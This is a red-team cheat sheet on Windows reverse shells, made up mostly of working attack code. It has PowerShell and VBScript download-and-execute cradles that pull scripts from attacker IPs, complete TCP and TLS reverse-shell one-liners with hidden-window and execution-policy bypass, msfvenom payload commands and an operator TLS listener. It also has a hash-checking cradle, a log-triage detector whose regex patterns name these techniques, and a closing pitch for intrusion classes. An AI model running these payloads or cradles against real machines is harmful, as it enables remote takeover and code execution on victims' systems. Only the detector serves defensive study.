# Windows Reverse Shell

### Windows Reverse Shells

#### Power of PowerShell on Windows

Download a reverse shell script onto the target machine. The examples assume `powerrev.ps1` is hosted on an attacker-controlled web server (for example `python3 -m http.server 80` run in the directory holding the script) and that a listener is already waiting for the connect-back:

{% code title="Download and execute the script" overflow="wrap" %}

```powershell
powershell.exe -c "iex (New-Object System.Net.WebClient).DownloadString('http://10.10.10.10/powerrev.ps1')"
```

{% endcode %}

{% code title="Run the shell in memory" overflow="wrap" %}

```powershell
powershell.exe -c "iex (Invoke-WebRequest 'http://10.10.10.10:8001/powerrev.ps1' -UseBasicParsing).Content"

powershell.exe -c "iex (iwr 'http://10.10.10.10:8001/powerrev.ps1' -UseBasicParsing).Content"
```

{% endcode %}

{% code title="Download the rev shell on the target and save it" overflow="wrap" %}

```powershell
powershell.exe Invoke-WebRequest -Uri http://10.10.10.10/powerrev.ps1 -OutFile c:\temp\powerrev.ps1
# A script on disk is scanned by AV and is subject to the execution policy; bypass the policy for this process only
powershell.exe -ExecutionPolicy Bypass -File c:\temp\powerrev.ps1
```

{% endcode %}

{% code title="Multiple ways to download and execute the shell on the victim system" overflow="wrap" %}

```powershell
iex (New-Object Net.WebClient).DownloadString('https://webserver/payload.ps1')

# Fetch through the Internet Explorer COM object, so the request inherits IE's proxy and cookie settings
$ie = New-Object -ComObject InternetExplorer.Application
$ie.visible = $False
$ie.navigate('http://192.168.56.102:8002/shell.ps1')
Start-Sleep -Seconds 2
# innerText returns the raw script; innerHTML wraps a text/plain response in <pre> tags
$response = $ie.Document.body.innerText
$ie.quit()
# Press Enter on an IE first-run dialog if one appeared; adjust the window title to match the target
$wshell = New-Object -ComObject wscript.shell
$wshell.AppActivate('Internet Explorer')
Start-Sleep -Seconds 3
$wshell.SendKeys("{ENTER}")
iex $response
```

{% endcode %}

{% code title="PSv3 onwards (iwr); the COM and .NET variants also work on PSv2" overflow="wrap" %}

```powershell
iex (iwr 'http://192.168.230.1/evil.ps1' -UseBasicParsing).Content

# MSXML COM object: no dependency on the .NET HTTP classes
$h = New-Object -ComObject Msxml2.XMLHTTP
$h.open('GET', 'http://192.168.56.102:8002/shell.ps1', $false)
$h.send()
iex $h.responseText

# Raw .NET WebRequest
$wr = [System.Net.WebRequest]::Create("http://192.168.56.102:8002/shell.ps1")
$r = $wr.GetResponse()
iex ([System.IO.StreamReader]($r.GetResponseStream())).ReadToEnd()
```

{% endcode %}
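Every cradle above runs whatever the web server (or anyone on the path, for plain HTTP) hands back. The following function, added here as an example and not part of the original page, chains three of the cradles as fallbacks but hashes the response and refuses to `iex` it unless the SHA-256 matches the one taken on the attacker box. The URL and the hash value are assumed placeholders.

```powershell
# Added example, not part of the original page: a download cradle that refuses to execute
# anything whose SHA-256 does not match the hash taken on the attacker box.
# The URL and expected hash passed at the bottom are assumed values.

function Invoke-VerifiedCradle {
    param(
        [Parameter(Mandatory)][string]$Url,
        [Parameter(Mandatory)][string]$ExpectedSha256
    )
    # Try the cradles from this page in turn; each yields the raw response bytes
    $bytes = $null
    try {
        # .NET WebClient: available on every PowerShell version, honours the system proxy
        $bytes = (New-Object Net.WebClient).DownloadData($Url)
    } catch {
        try {
            # MSXML COM object: independent of the .NET HTTP stack
            $h = New-Object -ComObject Msxml2.XMLHTTP
            $h.open('GET', $Url, $false)
            $h.send()
            $bytes = [byte[]]$h.responseBody
        } catch {
            # Invoke-WebRequest (PowerShell 3+); -UseBasicParsing avoids the IE DOM engine
            $content = (Invoke-WebRequest -Uri $Url -UseBasicParsing).Content
            $bytes = if ($content -is [string]) { [Text.Encoding]::UTF8.GetBytes($content) } else { [byte[]]$content }
        }
    }

    # Hash the exact bytes received, so the expected value is simply Get-FileHash / sha256sum of the file
    $sha256 = [Security.Cryptography.SHA256]::Create()
    $actual = [BitConverter]::ToString($sha256.ComputeHash($bytes)).Replace('-', '').ToLower()
    if ($actual -ne $ExpectedSha256.ToLower()) {
        throw "Refusing to run $Url : SHA-256 $actual does not match expected $ExpectedSha256"
    }

    # Decode, drop a UTF-8 BOM if the file was saved with one, then run in memory
    $script = [Text.Encoding]::UTF8.GetString($bytes).TrimStart([char]0xFEFF)
    Invoke-Expression $script
}

# Attacker box: (Get-FileHash .\powerrev.ps1 -Algorithm SHA256).Hash, or sha256sum powerrev.ps1 on Linux
# Invoke-VerifiedCradle -Url 'http://10.10.10.10/powerrev.ps1' -ExpectedSha256 '<sha256 of powerrev.ps1>'
```

The check costs nothing on the wire and turns a staging server that has been swapped out from under you into a loud failure instead of arbitrary code running under your foothold.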

{% code title="Download a file with VBScript (cmd.exe writes wget.vbs line by line)" overflow="wrap" %}

```batch
echo strUrl = WScript.Arguments.Item(0) > wget.vbs
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs
echo Dim http, varByteArray, strData, strBuffer, lngCounter, fs, ts >> wget.vbs
echo On Error Resume Next >> wget.vbs
echo Err.Clear >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs
echo http.Open "GET", strURL, False >> wget.vbs
echo http.Send >> wget.vbs
echo varByteArray = http.ResponseBody >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs
echo Set ts = fs.CreateTextFile(StrFile, True) >> wget.vbs
echo strData = "" >> wget.vbs
echo strBuffer = "" >> wget.vbs
echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs
echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1, 1))) >> wget.vbs
echo Next >> wget.vbs
echo ts.Close >> wget.vbs

REM On Error Resume Next is what lets the CreateObject fallback chain work instead of aborting on the first failure.
REM Usage: cscript //nologo wget.vbs <url> <local path>
cscript //nologo wget.vbs http://10.10.10.10/powerrev.ps1 C:\temp\powerrev.ps1
```

{% endcode %}

### More PowerShell reverse shells

{% code overflow="wrap" %}

```powershell
$LHOST = "10.10.10.10"; $LPORT = 9001; $TCPClient = New-Object Net.Sockets.TCPClient($LHOST, $LPORT); $NetworkStream = $TCPClient.GetStream(); $StreamReader = New-Object IO.StreamReader($NetworkStream); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); $StreamWriter.AutoFlush = $true; $Buffer = New-Object System.Byte[] 1024; while ($TCPClient.Connected) { while ($NetworkStream.DataAvailable) { $RawData = $NetworkStream.Read($Buffer, 0, $Buffer.Length); $Code = ([text.encoding]::UTF8).GetString($Buffer, 0, $RawData -1) }; if ($TCPClient.Connected -and $Code.Length -gt 1) { $Output = try { Invoke-Expression ($Code) 2>&1 } catch { $_ }; $StreamWriter.Write("$Output`n"); $Code = $null } }; $TCPClient.Close(); $NetworkStream.Close(); $StreamReader.Close(); $StreamWriter.Close()
```

{% endcode %}

{% code overflow="wrap" %}

```powershell
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.1.1',9001);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
```

{% endcode %}

{% code overflow="wrap" %}

```powershell
powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('10.10.1.1', 9001);$NetworkStream = $TCPClient.GetStream();$StreamWriter = New-Object IO.StreamWriter($NetworkStream);function WriteToStream ($String) {[byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0};$StreamWriter.Write($String + 'SHELL> ');$StreamWriter.Flush()}WriteToStream '';while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) {$Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1);$Output = try {Invoke-Expression $Command 2>&1 | Out-String} catch {$_ | Out-String}WriteToStream ($Output)}$StreamWriter.Close()"
```

{% endcode %}

{% code title="Base64-encoded one-liner (listener: nc -lvvnp 9001)" overflow="wrap" %}

```powershell
# -e is short for -EncodedCommand: Base64 of the UTF-16LE bytes of the script, so no quoting is needed on the command line
powershell -e <base64 of the UTF-16LE-encoded one-liner>
```

{% endcode %}

{% code title="PowerShell over TLS (SNI set to cloudflare-dns.com; the listener must terminate TLS, e.g. ncat --ssl or openssl s_server)" overflow="wrap" %}

```powershell
$sslProtocols = [System.Security.Authentication.SslProtocols]::Tls12; $TCPClient = New-Object Net.Sockets.TCPClient('10.10.1.1', 9001);$NetworkStream = $TCPClient.GetStream();$SslStream = New-Object Net.Security.SslStream($NetworkStream,$false,({$true} -as [Net.Security.RemoteCertificateValidationCallback]));$SslStream.AuthenticateAsClient('cloudflare-dns.com',$null,$sslProtocols,$false);if(!$SslStream.IsEncrypted -or !$SslStream.IsSigned) {$SslStream.Close();exit}$StreamWriter = New-Object IO.StreamWriter($SslStream);function WriteToStream ($String) {[byte[]]$script:Buffer = New-Object System.Byte[] 4096 ;$StreamWriter.Write($String + 'SHELL> ');$StreamWriter.Flush()};WriteToStream '';while(($BytesRead = $SslStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) {$Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1);$Output = try {Invoke-Expression $Command 2>&1 | Out-String} catch {$_ | Out-String}WriteToStream ($Output)}$StreamWriter.Close()
```

{% endcode %}
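The TLS client above passes a callback that returns `$true`, so no certificate validation happens on the target; `cloudflare-dns.com` is only the SNI name that shows up in network telemetry. That means the listener can use any certificate, but it does have to speak TLS: a plain `nc` listener will see a ClientHello and the shell will exit at the `IsEncrypted`/`IsSigned` check. On Linux `ncat --ssl -lvnp 9001` is enough. The function below is an added example, not part of the original page, for an operator box that runs Windows PowerShell: it mints a self-signed certificate and serves the shell interactively. Port, DNS name and the CAPI provider name are assumptions.

```powershell
# Added example, not from the original page: a TLS listener for the SslStream shell above.
# The client accepts any certificate and only sets SNI to cloudflare-dns.com, so a self-signed
# certificate is enough. Port, DnsName and the CAPI provider name are assumptions.

function Start-TlsShellListener {
    param(
        [int]$Port = 9001,
        [string]$DnsName = 'cloudflare-dns.com',
        [string]$Prompt = 'SHELL> '          # the client ends every reply with this string
    )
    # CAPI provider so that .NET Framework's SslStream can use the private key
    $cert = New-SelfSignedCertificate -DnsName $DnsName -CertStoreLocation 'Cert:\CurrentUser\My' `
        -Provider 'Microsoft Enhanced RSA and AES Cryptographic Provider'

    $listener = New-Object Net.Sockets.TcpListener([Net.IPAddress]::Any, $Port)
    $listener.Start()
    Write-Host "[*] TLS listener on 0.0.0.0:$Port, certificate $($cert.Thumbprint)"
    $client = $listener.AcceptTcpClient()
    $ssl = New-Object Net.Security.SslStream($client.GetStream(), $false)
    try {
        $ssl.AuthenticateAsServer($cert, $false, [Security.Authentication.SslProtocols]::Tls12, $false)
        Write-Host "[+] $($client.Client.RemoteEndPoint) connected: $($ssl.SslProtocol) $($ssl.CipherAlgorithm)"
        $buf = New-Object byte[] 4096
        $sb = New-Object Text.StringBuilder
        while ($true) {
            # Command output may span several TLS records; read until the prompt closes the reply
            [void]$sb.Clear()
            do {
                $n = $ssl.Read($buf, 0, $buf.Length)
                if ($n -le 0) { Write-Host "`n[-] connection closed"; return }
                [void]$sb.Append([Text.Encoding]::UTF8.GetString($buf, 0, $n))
            } until ($sb.ToString().EndsWith($Prompt))
            Write-Host -NoNewline $sb.ToString()
            $line = Read-Host
            # The client drops the last byte of each read, so terminate the command with a newline
            $out = [Text.Encoding]::UTF8.GetBytes($line + "`n")
            $ssl.Write($out, 0, $out.Length)
            $ssl.Flush()
        }
    } finally {
        $ssl.Dispose()
        $client.Close()
        $listener.Stop()
    }
}

Start-TlsShellListener -Port 9001
```

Reading until the prompt, rather than until the socket goes quiet, is what keeps long directory listings from being split across two of your commands; it relies on the client appending `SHELL> ` after every `Invoke-Expression`, which is what the one-liner above does.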

#### Windows Stageless reverse TCP <a href="#windows-stageless-reverse-tcp" id="windows-stageless-reverse-tcp"></a>

`windows/shell_reverse_tcp` is stageless: the complete shell is inside the executable, so a plain `nc -lvnp 4244` listener is enough to catch it.

{% code overflow="wrap" %}

```bash
msfvenom -p windows/shell_reverse_tcp LHOST=10.1.1.1 LPORT=4244 -f exe > reverse.exe
```

{% endcode %}

#### Windows Staged reverse TCP <a href="#windows-staged-reverse-tcp" id="windows-staged-reverse-tcp"></a>

`windows/meterpreter/reverse_tcp` is staged: the executable only carries a small stager that connects back and downloads the Meterpreter stage, so the listener must be Metasploit's `exploit/multi/handler` with the same payload, `LHOST` and `LPORT` set; `nc` cannot serve the stage.

{% code overflow="wrap" %}

```bash
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=4242 -f exe > reverse.exe
```

{% endcode %}

#### **Note on Modern Security Protections and Advanced Tactics**

The reverse shells above all share traits that modern Endpoint Detection and Response (EDR) products key on: a `powershell.exe` process started with `-nop`, `-w hidden` or `-ep bypass`, script content that passes through AMSI and script block logging (event 4104) before it runs, an outbound TCP connection opened by `powershell.exe` rather than by a browser, and, for the plain-TCP variants, command output travelling in cleartext. Detection therefore draws on process telemetry, script content and network traffic, not only on file signatures.

Bypasses do exist: injecting the payload into another process's memory, obfuscating the script so content matching fails, and using signed administrative tools so the activity resembles routine administration. They work by understanding the protection mechanism being evaded, not by any single trick.
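What that looks like from the defender's side, as an added example that is not part of the original text: a small triage function that flags the cradle and reverse-shell patterns shown on this page in PowerShell script block logs (event 4104 in `Microsoft-Windows-PowerShell/Operational`), expanding `-EncodedCommand` payloads first so the patterns are matched against the real script. The three sample script blocks are constructed for the demo; the commented `Get-WinEvent` call at the end runs the same check over real events.

```powershell
# Added example, not from the original page: flag the cradle and reverse-shell patterns shown
# above in PowerShell script block logs (event 4104). The sample script blocks are constructed.

$Indicators = @{
    'download-cradle' = 'DownloadString\(|DownloadFile\(|DownloadData\(|Invoke-WebRequest|\biwr\b|Msxml2\.XMLHTTP|WinHttp\.WinHttpRequest|InternetExplorer\.Application'
    'in-memory-exec'  = '\biex\b|Invoke-Expression'
    'tcp-client'      = 'Net\.Sockets\.TCPClient|\.GetStream\(\)'
    'tls-wrapper'     = 'Net\.Security\.SslStream|RemoteCertificateValidationCallback'
    'encoded-command' = '-e(nc(odedcommand)?)?\s+[A-Za-z0-9+/=]{40,}'
    'logging-evasion' = '-nop\b|-noni\b|-w(indowstyle)?\s+hidden|-ep\s+bypass|-ExecutionPolicy\s+Bypass'
}

function Find-ReverseShellIndicators {
    param([Parameter(Mandatory)][string[]]$ScriptBlocks)
    foreach ($block in $ScriptBlocks) {
        $text = $block
        # Expand -EncodedCommand payloads (Base64 of UTF-16LE) so the patterns see the real script
        if ($block -match '-e(nc(odedcommand)?)?\s+([A-Za-z0-9+/=]{40,})') {
            try { $text += "`n" + [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Matches[3])) } catch { }
        }
        # -match is case-insensitive, which suits the mixed casing seen in the one-liners above
        $hits = @($Indicators.Keys | Where-Object { $text -match $Indicators[$_] } | Sort-Object)
        if ($hits.Count -gt 0) {
            [pscustomobject]@{
                Score      = $hits.Count
                Indicators = $hits -join ','
                Sample     = $block.Substring(0, [Math]::Min(70, $block.Length))
            }
        }
    }
}

# Constructed samples: a WebClient cradle, benign admin activity, and an encoded TCP client
$Samples = @(
    'powershell.exe -nop -w hidden -c "iex (New-Object Net.WebClient).DownloadString(''http://10.10.10.10/powerrev.ps1'')"',
    'Get-ChildItem C:\Windows\Temp | Sort-Object LastWriteTime -Descending',
    'powershell -e ' + [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes('$c = New-Object Net.Sockets.TCPClient("10.10.1.1",9001);$s = $c.GetStream()'))
)
Find-ReverseShellIndicators -ScriptBlocks $Samples | Format-Table -AutoSize

# Live: the same check over the script block log (ScriptBlockText is property index 2 of event 4104)
# Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104 } -MaxEvents 500 |
#     ForEach-Object { $_.Properties[2].Value } | ForEach-Object { Find-ReverseShellIndicators -ScriptBlocks $_ }
```

Score is simply the number of distinct indicator families that fired; one family alone (`Invoke-WebRequest` in an update script, say) is routine, while a cradle plus `iex` plus `-w hidden` in a single block is the exact shape of the one-liners on this page.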

To learn more about these advanced evasion techniques and to gain hands-on experience in deploying reverse shells while circumventing modern security defenses, we encourage participation in our live red team classes (sessions). These sessions are designed to provide deep insights into the latest red teaming tactics and real-world applications, enabling participants to stay ahead in the ever-evolving landscape of cybersecurity threats and defenses. Join us to transform your theoretical knowledge into practical expertise and master the art of invisible intrusion.
